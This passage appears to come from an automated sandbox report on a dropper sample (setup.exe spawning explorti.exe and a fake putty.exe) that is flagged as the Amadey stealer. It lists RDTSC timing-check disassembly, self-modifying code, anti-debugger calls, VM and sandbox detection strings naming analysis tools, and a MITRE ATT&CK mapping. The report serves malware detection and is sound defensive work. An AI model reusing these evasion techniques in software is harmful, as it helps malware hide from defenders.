Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4B20CB7 second address: 4B20CC6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA5C6FB9EBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4B20CC6 second address: 4B20D28 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FEA5CDC3A1Fh 0x00000009 sbb eax, 7D6DDEDEh 0x0000000f jmp 00007FEA5CDC3A29h 0x00000014 popfd 0x00000015 pushfd 0x00000016 jmp 00007FEA5CDC3A20h 0x0000001b adc ch, FFFFFFD8h 0x0000001e jmp 00007FEA5CDC3A1Bh 0x00000023 popfd 0x00000024 popad 0x00000025 pop edx 0x00000026 pop eax 0x00000027 pop esi 0x00000028 push eax 0x00000029 push edx 0x0000002a pushad 0x0000002b mov edx, 518057C6h 0x00000030 mov ecx, ebx 0x00000032 popad 0x00000033 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 53960C second address: 539610 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 539610 second address: 539614 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4B30AB9 second address: 4B30ABD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4B30ABD second address: 4B30AC3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4B30AC3 second address: 4B30AF8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FEA5C6FB9F0h 0x00000009 sub ecx, 2E6EDE98h 0x0000000f jmp 00007FEA5C6FB9EBh 0x00000014 popfd 0x00000015 mov ecx, 7D37EC4Fh 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d push eax 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4B30AF8 second address: 4B30AFE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4B30AFE second address: 4B30B22 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA5C6FB9F9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov cl, FBh 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4B30B22 second address: 4B30B41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 mov ebp, esp 0x00000008 jmp 00007FEA5CDC3A21h 0x0000000d pop ebp 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 push ecx 0x00000012 pop edi 0x00000013 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4BB0105 second address: 4BB010B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4BB010B second address: 4BB0135 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA5CDC3A24h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FEA5CDC3A1Dh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4BB0135 second address: 4BB0139 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4BB0139 second address: 4BB013F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4BB013F second address: 4BB0145 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4BB0145 second address: 4BB0149 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4BB0149 second address: 4BB014D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4BB014D second address: 4BB01B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007FEA5CDC3A20h 0x00000010 xor ecx, 2827E918h 0x00000016 jmp 00007FEA5CDC3A1Bh 0x0000001b popfd 0x0000001c call 00007FEA5CDC3A28h 0x00000021 mov ax, CA51h 0x00000025 pop ecx 0x00000026 popad 0x00000027 mov ebp, esp 0x00000029 pushad 0x0000002a jmp 00007FEA5CDC3A23h 0x0000002f popad 0x00000030 pop ebp 0x00000031 push eax 0x00000032 push edx 0x00000033 push eax 0x00000034 push edx 0x00000035 push eax 0x00000036 push edx 0x00000037 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4BB01B6 second address: 4BB01BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4BB01BA second address: 4BB01C0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4BB01C0 second address: 4BB01C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4BB01C6 second address: 4BB01CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4BA04EC second address: 4BA04FE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA5C6FB9EEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4BA04FE second address: 4BA0517 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA5CDC3A1Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov ah, dh 0x0000000f movzx esi, di 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4BA0517 second address: 4BA0530 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FEA5C6FB9F5h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4BA0530 second address: 4BA0534 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4BA0534 second address: 4BA0552 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007FEA5C6FB9ECh 0x0000000e xchg eax, ebp 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 mov dx, 88C0h 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4BA0552 second address: 4BA05B9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop ecx 0x00000005 pushfd 0x00000006 jmp 00007FEA5CDC3A27h 0x0000000b add al, FFFFFF9Eh 0x0000000e jmp 00007FEA5CDC3A29h 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 mov ebp, esp 0x00000019 pushad 0x0000001a push ecx 0x0000001b jmp 00007FEA5CDC3A23h 0x00000020 pop ecx 0x00000021 mov bh, 15h 0x00000023 popad 0x00000024 pop ebp 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 push edx 0x00000029 jmp 00007FEA5CDC3A1Ah 0x0000002e rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4BA05B9 second address: 4BA05BF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4BA05BF second address: 4BA05C4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4BA02D3 second address: 4BA0322 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop edx 0x00000005 pushfd 0x00000006 jmp 00007FEA5C6FB9EEh 0x0000000b adc cl, 00000008h 0x0000000e jmp 00007FEA5C6FB9EBh 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 xchg eax, ebp 0x00000018 jmp 00007FEA5C6FB9F6h 0x0000001d push eax 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007FEA5C6FB9EDh 0x00000027 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4BA0322 second address: 4BA0337 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA5CDC3A21h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\Desktop\setup.exe	Special instruction interceptor: First address: 38EADB instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\setup.exe	Special instruction interceptor: First address: 38EA09 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\setup.exe	Special instruction interceptor: First address: 52E8FA instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Special instruction interceptor: First address: 2EEADB instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Special instruction interceptor: First address: 2EEA09 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Special instruction interceptor: First address: 48E8FA instructions caused by: Self-modifying code

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion	Jump to behavior

Source: C:\Users\user\Desktop\setup.exe

Code function: 0_2_04BA083E rdtsc

0_2_04BA083E

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Thread delayed: delay time: 180000

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window / User API: threadDelayed 1239	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window / User API: threadDelayed 1237	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window / User API: threadDelayed 420	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window / User API: threadDelayed 1252	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\1000009001\putty.exe

API coverage: 4.4 %

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7060	Thread sleep time: -52026s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 8188	Thread sleep count: 1239 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 8188	Thread sleep time: -2479239s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 8184	Thread sleep count: 1237 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 8184	Thread sleep time: -2475237s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 8164	Thread sleep count: 420 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 8164	Thread sleep time: -12600000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7192	Thread sleep time: -720000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 8180	Thread sleep count: 1252 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 8180	Thread sleep time: -2505252s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 8188	Thread sleep count: 331 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 8188	Thread sleep time: -662331s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\setup.exe

File Volume queried: C:\ FullSizeInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\1000009001\putty.exe	Code function: 7_2_00BEA160 GetProcAddress,FindFirstFileA,CloseHandle,		7_2_00BEA160
Source: C:\Users\user\AppData\Local\Temp\1000009001\putty.exe	Code function: 7_2_00BC9240 GetWindowsDirectoryA,_strlen,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,GetCurrentProcessId,		7_2_00BC9240

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Thread delayed: delay time: 30000			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Thread delayed: delay time: 180000			Jump to behavior

Source: explorti.exe, explorti.exe, 00000005.00000002.2984524213.0000000000470000.00000040.00000001.01000000.00000007.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: putty.exe, 00000007.00000002.2985078271.0000000000E8E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlls
Source: explorti.exe, 00000005.00000002.2985625138.0000000000D2A000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 00000005.00000003.2649511239.0000000000D2A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: explorti.exe, 00000005.00000002.2985625138.0000000000CFA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW(
Source: setup.exe, 00000000.00000002.1798507369.0000000000510000.00000040.00000001.01000000.00000003.sdmp, explorti.exe, 00000001.00000002.1831218417.0000000000470000.00000040.00000001.01000000.00000007.sdmp, explorti.exe, 00000005.00000002.2984524213.0000000000470000.00000040.00000001.01000000.00000007.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,

Source: C:\Users\user\Desktop\setup.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\setup.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\setup.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Thread information set: HideFromDebugger	Jump to behavior

Potentially malicious time measurement code found

Source: C:\Users\user\Desktop\setup.exe

Code function: 0_2_04BA0A4A Start: 04BA0EC8 End: 04BA0A5A

0_2_04BA0A4A

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	File opened: SIWVID

Source: C:\Users\user\Desktop\setup.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process queried: DebugPort	Jump to behavior

Source: C:\Users\user\Desktop\setup.exe

Code function: 0_2_04BA083E rdtsc

0_2_04BA083E

Source: C:\Users\user\AppData\Local\Temp\1000009001\putty.exe

Code function: 7_2_00C5612D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

7_2_00C5612D

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Code function: 5_2_002B645B mov eax, dword ptr fs:[00000030h]	5_2_002B645B
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Code function: 5_2_002BA1C2 mov eax, dword ptr fs:[00000030h]	5_2_002BA1C2
Source: C:\Users\user\AppData\Local\Temp\1000009001\putty.exe	Code function: 7_2_00C4C4A2 mov ecx, dword ptr fs:[00000030h]	7_2_00C4C4A2
Source: C:\Users\user\AppData\Local\Temp\1000009001\putty.exe	Code function: 7_2_00C57CE0 mov eax, dword ptr fs:[00000030h]	7_2_00C57CE0
Source: C:\Users\user\AppData\Local\Temp\1000009001\putty.exe	Code function: 7_2_00C57CAF mov eax, dword ptr fs:[00000030h]	7_2_00C57CAF
Source: C:\Users\user\AppData\Local\Temp\1000009001\putty.exe	Code function: 7_2_00C57D24 mov eax, dword ptr fs:[00000030h]	7_2_00C57D24

Source: C:\Users\user\AppData\Local\Temp\1000009001\putty.exe	Code function: 7_2_00C5612D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	7_2_00C5612D
Source: C:\Users\user\AppData\Local\Temp\1000009001\putty.exe	Code function: 7_2_00C4051A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	7_2_00C4051A
Source: C:\Users\user\AppData\Local\Temp\1000009001\putty.exe	Code function: 7_2_00C3FEBD SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	7_2_00C3FEBD

Source: C:\Users\user\Desktop\setup.exe	Process created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe "C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe"			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process created: C:\Users\user\AppData\Local\Temp\1000009001\putty.exe "C:\Users\user\AppData\Local\Temp\1000009001\putty.exe"			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\1000009001\putty.exe

Code function: 7_2_00BDCBD0 LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorOwner,SetSecurityDescriptorDacl,GetLastError,LocalFree,LocalFree,

7_2_00BDCBD0

Source: C:\Users\user\AppData\Local\Temp\1000009001\putty.exe

Code function: 7_2_00BDCD70 DeleteObject,AllocateAndInitializeSid,AllocateAndInitializeSid,GetLastError,GetLastError,GetLastError,

7_2_00BDCD70

Source: explorti.exe, explorti.exe, 00000005.00000002.2984524213.0000000000470000.00000040.00000001.01000000.00000007.sdmp

Binary or memory string: Program Manager

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Code function: 5_2_0029D312 cpuid

5_2_0029D312

Source: C:\Users\user\AppData\Local\Temp\1000009001\putty.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	7_2_00C5A27B
Source: C:\Users\user\AppData\Local\Temp\1000009001\putty.exe	Code function: EnumSystemLocalesW,	7_2_00C5A4D1
Source: C:\Users\user\AppData\Local\Temp\1000009001\putty.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	7_2_00C5A56C
Source: C:\Users\user\AppData\Local\Temp\1000009001\putty.exe	Code function: EnumSystemLocalesW,	7_2_00C5A7BF
Source: C:\Users\user\AppData\Local\Temp\1000009001\putty.exe	Code function: GetLocaleInfoW,	7_2_00C54777
Source: C:\Users\user\AppData\Local\Temp\1000009001\putty.exe	Code function: EnumSystemLocalesW,	7_2_00C5A8F3
Source: C:\Users\user\AppData\Local\Temp\1000009001\putty.exe	Code function: GetDesktopWindow,GetClientRect,CreateWindowExW,GetLastError,GetDC,GetDeviceCaps,GetDeviceCaps,GetDeviceCaps,ReleaseDC,GetWindowRect,GetClientRect,SetWindowPos,CreateBitmap,CreateCaret,SetScrollInfo,GetDoubleClickTime,GetSystemMenu,CreatePopupMenu,AppendMenuA,AppendMenuA,AppendMenuA,CreateMenu,DeleteMenu,DeleteMenu,AppendMenuA,AppendMenuA,AppendMenuA,AppendMenuA,AppendMenuA,AppendMenuA,AppendMenuA,AppendMenuA,AppendMenuA,AppendMenuA,AppendMenuA,AppendMenuA,AppendMenuA,AppendMenuA,AppendMenuA,AppendMenuA,AppendMenuA,AppendMenuA,GetKeyboardLayout,GetLocaleInfoA,ShowWindow,SetForegroundWindow,GetForegroundWindow,UpdateWindow,PeekMessageW,IsWindow,PeekMessageA,GetForegroundWindow,MsgWaitForMultipleObjects,DispatchMessageW,PeekMessageW,IsWindow,IsDialogMessageA,	7_2_00BA48D7
Source: C:\Users\user\AppData\Local\Temp\1000009001\putty.exe	Code function: GetLocaleInfoW,	7_2_00C5A81E
Source: C:\Users\user\AppData\Local\Temp\1000009001\putty.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	7_2_00C5A9E5
Source: C:\Users\user\AppData\Local\Temp\1000009001\putty.exe	Code function: GetLocaleInfoW,	7_2_00C5A93E
Source: C:\Users\user\AppData\Local\Temp\1000009001\putty.exe	Code function: GetLocaleInfoW,	7_2_00C5AAEB
Source: C:\Users\user\AppData\Local\Temp\1000009001\putty.exe	Code function: GetLocaleInfoA,DefWindowProcW,	7_2_00BA1B3F
Source: C:\Users\user\AppData\Local\Temp\1000009001\putty.exe	Code function: EnumSystemLocalesW,	7_2_00C54EC5

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000009001\putty.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000009001\putty.exe VolumeInformation	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\1000009001\putty.exe

Code function: 7_2_00C30910 ___from_strstr_to_strchr,CreateNamedPipeA,CreateEventA,GetLastError,

7_2_00C30910

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Code function: 5_2_0029CB1A GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime,

5_2_0029CB1A

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Code function: 5_2_002865B0 LookupAccountNameA,

5_2_002865B0

Source: C:\Users\user\AppData\Local\Temp\1000009001\putty.exe

Code function: 7_2_00C65AE6 GetTimeZoneInformation,

7_2_00C65AE6

Source: C:\Users\user\AppData\Local\Temp\1000009001\putty.exe

Code function: 7_2_00BDD2F0 GetVersionExA,GetProcAddress,

7_2_00BDD2F0

Stealing of Sensitive Information

Yara detected Amadeys stealer DLL

Source: Yara match	File source: 1.2.explorti.exe.280000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.explorti.exe.280000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.setup.exe.320000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.2984385861.0000000000281000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1831147781.0000000000281000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1798369815.0000000000321000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.1790882311.0000000005300000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.2335250308.0000000004A40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1757925772.00000000049A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\AppData\Local\Temp\1000009001\putty.exe	Code function: 7_2_00BD64C0 closesocket,socket,SetHandleInformation,setsockopt,setsockopt,setsockopt,htonl,htons,bind,WSAGetLastError,WSAGetLastError,htons,htonl,htons,connect,WSAGetLastError,		7_2_00BD64C0
Source: C:\Users\user\AppData\Local\Temp\1000009001\putty.exe	Code function: 7_2_00BD69B0 socket,SetHandleInformation,_strncpy,setsockopt,inet_addr,htonl,htonl,getaddrinfo,htons,htons,bind,listen,closesocket,WSAGetLastError,closesocket,closesocket,WSAGetLastError,		7_2_00BD69B0

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	2 Command and Scripting Interpreter	1 Scheduled Task/Job	13 Process Injection	11 Masquerading	11 Input Capture	2 System Time Discovery	Remote Services	11 Input Capture	11 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
